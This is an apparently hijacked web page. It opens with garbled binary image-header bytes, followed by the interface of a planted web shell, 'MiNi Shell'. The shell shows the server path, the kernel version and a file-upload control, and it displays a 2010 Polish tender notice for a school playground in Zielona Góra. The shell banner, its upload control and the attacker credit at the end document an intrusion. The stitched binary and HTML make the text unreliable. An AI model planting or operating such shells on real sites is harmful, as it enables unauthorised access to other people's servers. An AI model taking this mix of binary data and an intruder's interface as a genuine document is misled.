JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/189409-N-2010.html

<p class="kh_header"><b>Zielona Góra: zagospodarowanie terenu placu zabaw przy Szkole Podstawowej Nr 1  ul. Wyszyńskiego 17 w Zielonej Górze w ramach programu rządowego Radosna szkoła</b><br>
<b>Numer ogłoszenia: 189409 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 1 , ul. Wyszyńskiego 17, 65-536 Zielona Góra, woj. lubuskie, tel. 068 3264886, faks 068 3264886.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp1.bipzielonagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zagospodarowanie terenu placu zabaw przy Szkole Podstawowej Nr 1  ul. Wyszyńskiego 17 w Zielonej Górze w ramach programu rządowego Radosna szkoła.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zagospodarowanie terenu placu zabaw przy Szkole Podstawowej
     Nr 1  ul. Wyszyńskiego 17 w Zielonej Górze w ramach programu rządowego Radosna
     szkoła ;   
2.   Przedmiot zamówienia należy wykonać zgodnie z:
2.1.projektem budowlanym opracowanym przez Łącki Krzywoszański Architektci  Sp. z o.o.  
     i Spółka Komandytowa , ul. Piaskowa 3m1 w Zielonej Górze stanowiącym załącznik  Nr 11 do
     niniejszej  SIWZ;
2.2. Specyfikacją Techniczną  stanowiącą załącznik Nr  12  do  niniejszej SIWZ; 
3.     W zakres prac objętych przedmiotem zamówienia wchodzą:
3.1.  roboty ziemne:
-       roboty pomiarowe przy powierzchniowych robotach ziemnych,
-       ręczne usunięcie z przerzutem warstwy ziemi urodzajnej-humusu z darnią , grubość warstwy do 
       15cm
-       ręczne usunięcie humusu z darnią , dodatek za każde dalsze 5 cm grubości warstwy,
-       rozplantowanie ręczne 1m3 humusu z darniną,  
3.2. nawierzchnie placu:
-        profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywanie 
         ręcznie, w   gruntach III kategorii,
-         warstwa osączająca w korycie, zagęszczanie ręczne, grubość warstwy po zagęszczaniu 10 cm,
-        dolna warstwa podbudowy z kruszywa łamanego , grubość warstwy po zagęszczeniu 15 cm,
-        podbudowy z kruszywa łamanego, warstwa górna o grubości 8 cm, po zagęszczeniu
-        nawierzchnia bezpieczna  z elastycznych płytek o wym. 500x500x50mm , układanych na 
         gotowym  podłożu,
-        nawierzchnia bezpieczna  z elastycznych płytek o wym. 500x500x80mm;
-        nawierzchnia bezpieczna  z elastycznych płytek o wym. 500x500x100mm;
-        krawężnik elastyczny z mocowaniem o wymiarach 1000x250x50 mm.
3.3. zieleń:
-       ręczne przekopanie gleby w gruncie kat. III na terenie płaskim, zadarniowanym,
-       ręczne rozrzucenie mieszanki z torfu i nawozów mineralnych o grubości warstwy 2 cm, na terenie 
         płaskim,
-       wykonanie trawników dywanowych siewem bez nawożenia, grunt Kat II,
3.4. dostawa i montaż nowych  urządzeń zabawowych  na terenie placu zabaw:
-      przeplotnia  o trzech wysokościach-  zabawka typu urządzenie sportowe , trzy drążki na różnych 
       wysokościach ustawione gwiaździście -  1 szt,
-      huśtawka  podwójna wahadłowa - zabawka typu huśtawka  -dwustanowiskowa z siedziskami na 
       łańcuchach  rozpiętymi na konstrukcji   bramowej -1 szt,
-     urządzenie wspinaczkowe z  jedną wieżą ( bez zadaszenia) ślizgawką  i  trzema drabinkami - 
        1szt,
-      huśtawka na sprężynach  - zabawka na dwóch sprężynach z siedziskiem w kształcie 
        trójpalczastych  liści z metalowym  obrzeżem wraz z dwoma siedziskami w kształcie kwiatka, 
        całość połączona   wygiętymi w pałąk  rurkami metalowymi- 1 szt,
-        huśtawka wagowa typu ważka, 4 osobowa  -zabawka typu huśtawka wagowa-cztery siedziska w 
          kształcie kwiatka umieszczone na ruchomej  konstrukcji- 1 szt,
-        ławka z trzema siedziskami w kształcie kwiatka  - 2  szt,
-        tablica informacyjna -  zawierająca regulamin określający zasady i warunki korzystania ze 
         szkolnego   placu zabaw - 1 szt.
         szczegółowy opis parametrów zawiera specyfikacja techniczna.
4.  Wszystkie urządzenia należy zmontować zgodnie z instrukcją producenta i zgodnie ze sztuką 
      budowlaną tak aby  każde z nich posiadało wymaganą przepisami strefę bezpieczeństwa.
       Instrukcja montażu zostanie  przekazana  Inspektorowi nadzoru w celu umożliwienia sprawdzenia
       zgodności  montażu.
5.   Wszystkie urządzenia przeznaczone do zamontowania na modernizowanym placu zabaw dla 
      dzieci    muszą  spełniać wymogi formalne odpowiednie do wieku użytkowników, posiadać atesty i
      certyfikaty   wydane przez jednostki certyfikujące, posiadające akredytację Polskiego Centrum 
       Akredytacji, a także   spełniać wymogi norm polskich i UE:
5.1. PN-EN 1176-1:2009 ,
5.2. PN-EN 1176-2:2009 ,
5.3. PN-EN 1176-6:2009 ,
6.    Urządzenia muszą być fabrycznie nowe. Dokładne parametry techniczne urządzeń zabawowych 
       zawarte są w  specyfikacji technicznej .
7.    Urządzenia muszą być zabezpieczone przed korozją i wpływami atmosferycznymi  na okres nie 
      mniejszy niż udzielona gwarancja, posiadać wysoka jakość, estetykę, zapewniać bezpieczeństwo i 
     skuteczność dla korzystających z tych urządzeń. 
8.   Wszystkie urządzenia musza być oznakowane  zgodnie z wymogami wynikającymi z przepisów 
      bezpieczeństwa , norm EN i PN oraz przepisów Prawa Budowlanego. 
9.  Szczegółowy zakres robót zawarty jest w  kosztorysie ofertowym  stanowiącym załącznik Nr 10 do
     niniejszej SIWZ;
10.Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową
     obejmuje również:
10.1.organizację, zagospodarowanie i utrzymanie zaplecza budowy, roboty przygotowawcze 
       i porządkowe;
10.2.pełnego ubezpieczenia budowy zgodnie z obowiązującymi przepisami prawa;
10.3.zorganizowanie i przeprowadzenie niezbędnych odbiorów;
10.4.ponoszenie kosztów związanych ze zużyciem wody i energii elektrycznej na potrzeby budowy;
10.5.zapewnienie na terenie  budowy należytego ładu i porządku, przestrzeganie przepisów BHP oraz
       utrzymanie  terenu budowy w stanie wolnym od przeszkód komunikacyjnych i wydzielenie stref
       bezpieczeństwa;
10.6.zapewnienie i ponoszenie kosztów związanych z usunięciem oraz składowaniem materiałów
        rozbiórkowych i innych odpadów powstałych w czasie realizacji przedmiotu zamówienia;
10.7.po zakończeniu robót uporządkowaniu terenu, w terminie nie późniejszym niż termin odbioru
       przedmiotu zamówienia;
11. Wykonawca na wykonany przedmiot zamówienia udzieli gwarancji należytego wykonania robót na
      okres 36 miesięcy oraz rękojmi za wady robót na okres przekraczający gwarancję 
     o 6 miesięcy;
12. Wykonawca winien dostarczyć Zamawiającemu przed podpisaniem umowy:
12.1.kopię aktualnej (opłaconej) polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie
            prowadzonej działalności gospodarczej o wartości minimum  240 000,00  zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie  ostatnich pięciu lat przed upływem terminu  składania ofert do udziału w postępowaniu , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał co najmniej jedno zadanie w zakresie wykonania lub modernizacji placów zabaw 
o minimalnej wartości 100.000,00 zł brutto  udokumentowane,  że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone

 Ocena spełniania ww. warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca   winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą 
uczestniczyć w wykonywaniu zamówienia , w szczególności do kierowania robotami budowlanymi , 
należącymi do właściwej izby samorządu zawodowego, posiadającymi zgodnie z ustawą z dnia 7 lipca 
1994r.-Prawo budowlane ( Dz. U. z 2006r. Nr 156, poz.1118-tekst jednolity z późn. zm.) uprawnienia 
budowlane w specjalności w specjalności  konstrukcyjno - budowlanej co najmniej w ograniczonym 
zakresie  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej 
obowiązujących przepisów.

Ocena spełniania ww. warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia  nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp 
    wg załącznika Nr 3 do SIWZ,
- oświadczenie, że wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia,
   której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ, 
- dokładnie wypełniony kosztorys ofertowy ( w polskich złotych , z dokładnością do dwóch miejsc po
  przecinku)  wg załącznika Nr 10 do SIWZ
- zaakceptowany projekty umowy wg załącznika Nr 9  do SIWZ, 
- pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania
  Wykonawcy,   o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dopuszczalne w zakresie przewidzianym w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp1.bipzielonagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie
        Zamawiającego w sekretariacie osobiście po okazaniu dowodu wniesienia opłaty w  wysokości
       15,00 zł ( 22,50 zł po przesyłce pocztą)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 09:00, miejsce: siedziba Zamawiającego, sekretariat ( I piętro). Otwarcie ofert w dniu 30.07.2010  o godz. 09:15, siedziba Zamawiającego gabinet dyrektora ( I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com